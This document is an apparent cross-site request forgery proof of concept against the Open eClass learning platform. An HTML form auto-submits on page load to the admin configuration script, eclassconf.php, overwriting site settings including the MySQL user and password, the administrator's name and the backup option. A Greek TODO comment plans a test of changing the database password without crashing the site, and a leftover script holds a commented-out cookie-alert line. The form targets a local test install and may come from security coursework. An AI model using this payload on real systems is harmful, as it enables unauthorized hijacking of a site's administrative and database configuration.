<body onload='document.forms[0].submit()'>
<form method="POST" action="http://localhost:1180/modules/admin/eclassconf.php">

<td><input class="FormData_InputText" type="text" name="formurlServer" size="40" value="http://localhost:1180/"></td>
 <td><input class="FormData_InputText" type="text" name="formwebDir" size="40" value="/media/sf_openeclass/"></td>
 <td><input class="FormData_InputText" type="text" name="formmysqlServer" size="40" value="localhost"></td>
 <td><input class="FormData_InputText" type="text" name="formmysqlUser" size="40" value="root"></td>
<td><input class="FormData_InputText" type="password" name="formmysqlPassword" size="40" value="123"></td>
<td><input class="FormData_InputText" type="text" name="formmysqlMainDb" size="40" value="eclass"></td>
<td><input class="FormData_InputText" type="text" name="formphpMyAdminURL" size="40" value="../admin/mysql/"></td>
<td><input class="FormData_InputText" type="text" name="formphpSysInfoURL" size="40" value="../admin/sysinfo/"></td>
<td><input class="FormData_InputText" type="text" name="formemailAdministrator" size="40" value="webmaster@localhost"></td>
<td><input class="FormData_InputText" type="text" name="formadministratorName" size="40" value="hgfh"></td>
<td><input class="FormData_InputText" type="text" name="formadministratorSurname" size="40" value="Πλατdfhgφόρμας"></td>
<td><input class="FormData_InputText" type="text" name="formsiteName" size="40" value="Open eClass"></td>
<td><input class="FormData_InputText" type="text" name="formInstitutionUrl" size="40" value="http://www.gunet.gr/"></td>
<td><select name="formlanguage">
      <option selected value="greek"></option></select></td>
<td><select name="formcloseuserregistration">
      <option selected value="false"></option></select></td>
<td><input type="text" name="formdurationAccount" size="40" value="126144000"></td>
 <td><input type="checkbox" checked disabled></td>
  <td><input type="checkbox" name="backupfile" checked></td>
<input type="submit"></form></body>

/********************************************************* 
TODO:: να συμπληρωσω τα υπολοιπα στοιχεια της φορμας και να δοκιμασω αν γινεται να αλλαξει ο κωδικος της βασης χωρις να "πεσει" το υπολοιπο σαιτ 
********************************************************/



<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();

        // alert(document.cookie);

      }
</script>

